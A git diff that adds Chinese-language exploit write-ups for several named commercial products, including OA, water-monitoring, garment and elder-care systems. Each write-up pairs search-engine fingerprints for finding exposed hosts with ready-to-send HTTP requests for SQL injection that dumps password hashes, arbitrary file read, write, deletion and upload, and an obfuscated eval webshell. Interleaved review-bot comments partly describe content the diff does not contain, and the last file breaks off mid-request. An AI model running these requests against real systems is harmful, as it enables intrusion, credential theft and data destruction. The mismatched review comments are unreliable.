file diff --git a/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md b/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md new file mode 100644 index 0000000..38ea6d8 --- /dev/null +++ b/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md 
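Review bot: the value `c4ca4238a0b923820dcc509a6f75849` shown after the request is 31 characters, while md5(1) is `c4ca4238a0b923820dcc509a6f75849b`; the missing last character is expected because `extractvalue` reports at most 32 characters of the XPath error and the leading `~` from `concat(0x7e,...)` takes one of them. Say so in the text, otherwise a reader comparing against a full MD5 concludes the result is wrong. The 漏洞简介 runs the marketing sentence straight into `帮管客CRM 客户管理系统/index.php/message 接口...` with no punctuation between them.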
@@ -0,0 +1,57 @@ +# 平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞 + +# 一、漏洞简介 +唐山平升电子技术开发有限公司于1999年成立,位于唐山市国家高新技术开发区,是河北省高科技企业,是国内最早生产GPRS数据传输模块的企业之一,专注水行业远程测控设备和系统软件的专业制造商。公司自成立以来,始终致力于供水、水资源远程测控新技术、新产品的开发生产,其中GPRS数据传输模块应用到青藏铁路、大庆油田、曹妃甸工业区等许多国家重点工程和大型企业;水源井远程测控终端通过了国家权威机构的检验、获得国家专利、批量应用到浙江、山西、山东、辽宁、江苏、河南、河北、内蒙、陕西、北京、天津、唐山等许多地区的水务部门,成为行业中的名牌产品。平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限 。 + +# 二、影响版本 ++ 平升电子水库安全监管平台 + +# 三、资产测绘 ++ fofa`body="js/PSExtend.js"` ++ 特征 + +![1710688105375-14ec86fd-745f-4b3c-a67b-f02aa940459c.png](./img/oCDAx2tRVXTcV9Ym/1710688105375-14ec86fd-745f-4b3c-a67b-f02aa940459c-537710.png) + +# 四、漏洞复现 +首先获取Guid + +```plain +POST /Webservices/UserAdminService.asmx/Login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 +Connection: close + +LoginName=Data86&LoginPwd=Data86%40 +``` + +![1716451555256-4b68752c-8c40-4044-99d5-62f6b42e3c44.png](./img/oCDAx2tRVXTcV9Ym/1716451555256-4b68752c-8c40-4044-99d5-62f6b42e3c44-488482.png) + +替换获取的Guid发送数据包 + +```plain +POST /WebServices/DataBaseService.asmx/GetRecordsByTableNameAndColumns HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 105 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Connection: close + 
+loginIdentifer=07deec48-6ee8-4127-9b27-fda9ae2036f9&requestInfos=&tableName=syscolumns&columns=top+1+substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32) +``` + +![1716451619577-c49d1ee3-f6c3-4e57-9e8a-2e025ad3621b.png](./img/oCDAx2tRVXTcV9Ym/1716451619577-c49d1ee3-f6c3-4e57-9e8a-2e025ad3621b-115713.png) + + + + + +> 更新: 2024-05-26 11:28:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pq90gr1d4fdx1r82> \ No newline at end of file diff --git a/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md b/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md new file mode 100644 index 0000000..e0554d7 --- /dev/null +++ b/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md @@ -0,0 +1,30 @@ +# 广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞 + +# 一、漏洞简介 +广州锦铭泰软件科技有限公司,是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业,该公司开发的F22服装管理软件系统存在信息泄漏漏洞,攻击者最终可利用该漏洞获取数据库账号密码等连接信息。 + +# 二、影响版本 ++ F22服装管理软件系统 + +# 三、资产测绘 ++ hunter ++ 特征 + +![1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567.png](./img/MHECYITamkoAwlWR/1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567-922677.png) + +# 四、漏洞复现 +```java +GET /pos/index_login.asp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1702014624209-0f6319f6-e292-4c9c-a571-8600d6f09242.png](./img/MHECYITamkoAwlWR/1702014624209-0f6319f6-e292-4c9c-a571-8600d6f09242-352619.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ols3csnzkgnc69fn> \ No newline at end of file diff --git a/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md b/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md new file mode 100644 index 0000000..03a3891 --- /dev/null +++ b/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md 
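Review bot: the first request of the 平升 hunk logs in with `LoginName=Data86&LoginPwd=Data86%40`, but the text only says `首先获取Guid` and never states whether these are built-in or default credentials; the 漏洞简介 claim that an attacker can reach the database depends on that login succeeding, so the precondition must be stated explicitly. `Content-Length: 105` on the second request does not match the body shown. 影响版本 lists only the product name with no version.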
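Review bot: in the F22 index_login hunk the `hunter` bullet under 资产测绘 has no query after it (compare `hunter\`app.name=="..."\`` in the other files), so the asset-mapping section is empty apart from the screenshot. The 漏洞简介 says database connection details are disclosed, but the request is a plain `GET /pos/index_login.asp` and nothing in the text says where in the response they appear; add a sentence describing the response instead of relying on the screenshot.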
@@ -0,0 +1,32 @@ +# 广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载 + +# 一、漏洞简介 +广州锦铭泰软件科技有限公司,是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业,该公司开发的F22服装管理软件系统存在接口未授权访问,通过未授权的口/oa/isprit/module/openfile.aspx存在任意文件下载漏洞。攻击者最终可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ F22服装管理软件系统 + +# 三、资产测绘 ++ hunter ++ 特征 + +![1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567.png](./img/F6ehaHwmiT2nLKU9/1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567-711181.png) + +# 四、漏洞复现 +```plain +GET /oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1701097898821-70329903-417e-40d4-b245-8c141fdfe265.png](./img/F6ehaHwmiT2nLKU9/1701097898821-70329903-417e-40d4-b245-8c141fdfe265-689811.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ghu980augeuitr7e> \ No newline at end of file diff --git a/广联达OA系统接口do.asmx存在任意文件写入漏洞.md b/广联达OA系统接口do.asmx存在任意文件写入漏洞.md new file mode 100644 index 0000000..6f94825 --- /dev/null +++ b/广联达OA系统接口do.asmx存在任意文件写入漏洞.md 
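Review bot: `通过未授权的口/oa/isprit/module/openfile.aspx` in the 漏洞简介 is missing a character (`接口`) and runs two claims together (unauthenticated access and arbitrary download) in one sentence. As in the index_login file, the `hunter` bullet under 资产测绘 has no query. 影响版本 lists only `F22服装管理软件系统` with no version, and no fixed release is cited.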
@@ -0,0 +1,62 @@ +# 广联达OA系统接口do.asmx存在任意文件写入漏洞 + +广联达OA系统接口do.asmx存在任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc + +```javascript +POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=WriteAllBytes HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/json +Connection: close + +["\"D:\\\\Program Files (x86)\\\\Glodon\\\\GTP\\\\data\\\\gtp-default\\\\FileStorage\\\\UserFiles\\\\1.asp\"","[60, 37, 32, 82, 101, 115, 112, 111, 110, 115, 101, 46, 87, 114, 105, 116, 101, 40, 34, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 34, 41, 32, 37, 62]","false"] +``` + +请求体中的上传路径并不通用,需要根据实际环境选择,文件的内容需要转换为ASCII码 + +```python +def ascii_to_char(ascii_codes): + """将ASCII码列表转换为字符""" + return ''.join(chr(code) for code in ascii_codes) + +def char_to_ascii(char): + """将字符串转换为ASCII码列表""" + return [ord(c) for c in char] + +def main(): + print("0 字符转ASCII码") + print("1 ASCII码转字符") + choice = input("请选择转换类型(0/1): ") + + if choice == '0': + # 字符转ASCII码 + chars = input("请输入要转换的字符: ") + ascii_codes = char_to_ascii(chars) + print("字符转ASCII码:", ascii_codes) + elif choice == '1': + # ASCII码转字符 + ascii_codes_str = input("请输入以逗号分隔的ASCII码(例如:65,66,67): ") + ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')] + converted_chars = ascii_to_char(ascii_codes) + print("ASCII码转字符:", converted_chars) + else: + print("无效的输入,请输入0或1。") + +if __name__ == "__main__": + main() +``` + 
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650271.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650535.png) \ No newline at end of file diff --git a/广联达OA系统接口do.asmx存在任意文件读取漏洞.md b/广联达OA系统接口do.asmx存在任意文件读取漏洞.md new file mode 100644 index 0000000..3586436 --- /dev/null +++ b/广联达OA系统接口do.asmx存在任意文件读取漏洞.md 
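Review bot: the paragraph after the request says the write path is environment-specific, which is good, but the Python helper that follows is duplicated verbatim in the next file (`...do.asmx存在任意文件读取漏洞.md`) under the heading `解密脚本`; keep one copy and name it for what it does, a converter between text and ASCII code lists, since nothing is decrypted. This file has no 影响版本, no fixed version and no numbered section structure, unlike the other entries in the commit.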
@@ -0,0 +1,61 @@ +# 广联达OA系统接口do.asmx存在任意文件读取漏洞 + +广联达OA系统接口` /m/mobileAction.ashx/do.asmx`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc + +```javascript +POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=ReadAllBytes HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/json +Connection: close + +["\"C:\\\\Windows\\\\win.ini\""] +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141646757.png) + +### 解密脚本 + +```python +def ascii_to_char(ascii_codes): + """将ASCII码列表转换为字符""" + return ''.join(chr(code) for code in ascii_codes) + +def char_to_ascii(char): + """将字符串转换为ASCII码列表""" + return [ord(c) for c in char] + +def main(): + print("0 字符转ASCII码") + print("1 ASCII码转字符") + choice = input("请选择转换类型(0/1): ") + + if choice == '0': + # 字符转ASCII码 + chars = input("请输入要转换的字符: ") + ascii_codes = char_to_ascii(chars) + print("字符转ASCII码:", ascii_codes) + elif choice == '1': + # ASCII码转字符 + ascii_codes_str = input("请输入以逗号分隔的ASCII码(例如:65,66,67): ") + ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')] + converted_chars = ascii_to_char(ascii_codes) + print("ASCII码转字符:", converted_chars) + else: + print("无效的输入,请输入0或1。") + +if __name__ == "__main__": + main() +``` + diff --git a/广联达oa-sql注入漏洞-.md b/广联达oa-sql注入漏洞-.md new file mode 100644 index 0000000..1d07277 --- /dev/null +++ b/广联达oa-sql注入漏洞-.md 
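Review bot: the response of the `ReadAllBytes` call is never described; only the `ASCII码转字符` branch of the helper suggests that the server returns the file as a list of byte values, so state that in a sentence rather than leaving it to the screenshot. The heading `解密脚本` is misleading because the helper only converts between characters and ASCII codes, and it is a verbatim copy of the block in the preceding `任意文件写入` file; the 影响版本 and fixed-version information is missing here as well.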
@@ -0,0 +1,17 @@ +## 广联达oa sql注入漏洞 POC +``` +POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 +Host: xxx.com +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 88 + +dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER -- +``` diff --git a/广联达oa-后台文件上传漏洞.md b/广联达oa-后台文件上传漏洞.md new file mode 100644 index 0000000..2018271 --- /dev/null +++ b/广联达oa-后台文件上传漏洞.md 
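Review bot: this file has no product description, 影响版本 or 资产测绘 section, only a title and a request, unlike the other 广联达 entries in the commit. `Content-Length: 88` does not match the body, the `Accept` header reads `application/xhtml xml` (the `+` was lost), and `Cookie:` is empty, so the text should say whether `/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary` is reachable without a session.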
@@ -0,0 +1,32 @@ +## 广联达oa 后台文件上传漏洞 + +``` +POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 +Host: 10.10.10.1:8888 +X-Requested-With: Ext.basex +Accept: text/html, application/xhtml+xml, image/jxr, */* +Accept-Language: zh-Hans-CN,zh-Hans;q=0.5 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: */* +Origin: http://10.10.10.1 +Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40 +Cookie: +Connection: close +Content-Length: 421 + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" +Content-Type: application/text + +<%@ Page Language="Jscript" Debug=true%> +<% +var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'; +var GFMA=Request.Form("qmq1"); +var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1); +eval(GFMA, ONOQ); +%> + +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- +``` diff --git a/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md b/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md new file mode 100644 index 0000000..34b5504 --- /dev/null +++ b/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md 
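Review bot: the title says 后台 (post-authentication) but the request's `Cookie:` header is blank and the file has no prose at all, so state that a logged-in session is required. The `Host`, `Origin` and `Referer` headers use the lab address `10.10.10.1`, and `Referer` carries a `configID` and `menuitemid` from one instance; mark these as placeholders. The hunk also lacks the fofa and 影响版本 sections that the other 广联达 entries carry.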
@@ -0,0 +1,44 @@ +# 广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞 + +# 一、漏洞简介 +广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司——金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞。 + +# 二、影响版本 ++ 智慧医养服务平台 + +# 三、资产测绘 ++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"` ++ 特征 + +![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/xow1UnbQOxtonEIR/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-888430.png) + +# 四、漏洞复现 +1. 当前文件存在 + +```plain +/Content/Upload/202407/18/1.aspx +``` + +![1721304183404-85076103-3aca-4afb-8b6c-edf61a5f8dd5.png](./img/xow1UnbQOxtonEIR/1721304183404-85076103-3aca-4afb-8b6c-edf61a5f8dd5-791645.png) + +2. poc + +```plain +GET /DevApi/DownFile?FileName=../Content/Upload/202407/18/1.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +``` + +![1721304206313-487befae-1b4b-4efe-a327-39177abf481e.png](./img/xow1UnbQOxtonEIR/1721304206313-487befae-1b4b-4efe-a327-39177abf481e-167095.png) + +3. 当前文件已被删除 + +![1721304237409-e94de272-e4f1-44ee-acf4-e32bf23648ee.png](./img/xow1UnbQOxtonEIR/1721304237409-e94de272-e4f1-44ee-acf4-e32bf23648ee-178789.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ip0u6yn44ecxty0g> \ No newline at end of file diff --git a/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md new file mode 100644 index 0000000..3a55784 --- /dev/null +++ b/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞 + +# 一、漏洞简介 +广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司——金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 智慧医养服务平台 + +# 三、资产测绘 ++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"` ++ 特征 + +![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/9s3Ewn0Srh8yhvm0/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-337432.png) + +# 四、漏洞复现 +```plain +POST /DevApi/UpLoaderAction HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Length: 10338 + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="file"; filename="12.aspx" +Content-Type: image/png + +132 +-----------------------------45250802924973458471174811279 +``` + +![1721303068575-2999a4b5-ed33-4225-b812-be1fa319fa22.png](./img/9s3Ewn0Srh8yhvm0/1721303068575-2999a4b5-ed33-4225-b812-be1fa319fa22-013346.png) + +```plain +/Content/Upload/202407/18/12.aspx +``` + +![1721303092824-5f8236cb-148a-443a-82dc-4f32b58cbf6d.png](./img/9s3Ewn0Srh8yhvm0/1721303092824-5f8236cb-148a-443a-82dc-4f32b58cbf6d-518228.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rdeert6v3r8yl1kv> \ No newline at end of file diff --git a/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md new file mode 100644 index 0000000..3c6433f --- /dev/null +++ b/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞 + +# 一、漏洞简介 +广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司——金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 智慧医养服务平台 + +# 三、资产测绘 ++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"` ++ 特征 + +![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/jyyVjV_3Jtln2pe9/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-698303.png) + +# 四、漏洞复现 +```plain +POST /DevApi/Uploader HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Length: 10338 + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/png + +123 +-----------------------------45250802924973458471174811279 +``` + +![1721291820700-2d586dfe-9e61-4b58-94da-3f3b67d8878c.png](./img/jyyVjV_3Jtln2pe9/1721291820700-2d586dfe-9e61-4b58-94da-3f3b67d8878c-790966.png) + +```plain +/Content/Upload/202407/18/1.aspx +``` + +![1721291836932-3446c6bb-c27e-461f-a28a-c4e56ac1aa48.png](./img/jyyVjV_3Jtln2pe9/1721291836932-3446c6bb-c27e-461f-a28a-c4e56ac1aa48-000517.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/payri8rhhk98f9mm> \ No newline at end of file diff --git a/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md new file mode 100644 index 0000000..c3b046c --- /dev/null +++ b/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞 + +# 一、漏洞简介 +广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 智慧医养服务平台 + +# 三、资产测绘 ++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"` ++ 特征 + +![1721360047891-e62d7c12-039e-43ad-8463-3e0087883ef8.png](./img/XIEEraDWQdVmxuuv/1721360047891-e62d7c12-039e-43ad-8463-3e0087883ef8-966512.png) + +# 四、漏洞复现 +```plain +POST /Mobile/Uploads HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Length: 10338 + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/png + +123 +-----------------------------45250802924973458471174811279 +``` + +![1721304072527-78dbd3c0-d0a2-4a1d-bbee-3a1e27a608a9.png](./img/XIEEraDWQdVmxuuv/1721304072527-78dbd3c0-d0a2-4a1d-bbee-3a1e27a608a9-110706.png) + +```plain +/Content/Upload/202407/18/1.aspx +``` + +![1721304088397-88650e4e-ebe2-4763-ba53-e8f0a3876899.png](./img/XIEEraDWQdVmxuuv/1721304088397-88650e4e-ebe2-4763-ba53-e8f0a3876899-182681.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/im0lesizs3g3753g> \ No newline at end of file diff --git a/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md b/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md new file mode 100644 index 0000000..0596a70 --- /dev/null +++ b/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md 
@@ -0,0 +1,21 @@ +# 微信万能门店小程序系统_requestPost存在任意文件读取漏洞 +万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序,和后台通用模板。微信万能门店小程序系统存在任意文件读取漏洞 + +## fofa +```javascript +"/comhome/cases/index.html" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png) + +## poc +```java +GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/2 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732115844099-9921c837-e60b-49bb-abba-ee32694c6075.png) + diff --git a/微信万能门店小程序系统存在SQL注入漏洞.md b/微信万能门店小程序系统存在SQL注入漏洞.md new file mode 100644 index 0000000..89cd99a --- /dev/null +++ b/微信万能门店小程序系统存在SQL注入漏洞.md 
@@ -0,0 +1,34 @@ +# 微信万能门店小程序系统存在SQL注入漏洞 + +# 一、漏洞简介 +万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序,和后台通用模板。微信万能门店小程序系统存在SQL注入漏洞 + +# 二、影响版本 ++ 微信万能门店小程序系统 + +# 三、资产测绘 ++ fofa`<font style="color:rgb(221, 17, 68);">"/comhome/cases/index.html"</font>` ++ 特征 + +![1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png](./img/mzSFGhMGF76yKh7v/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f-603008.png) + +# 四、漏洞复现 +```java +POST /api/wxapps/doPageGetFormList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: 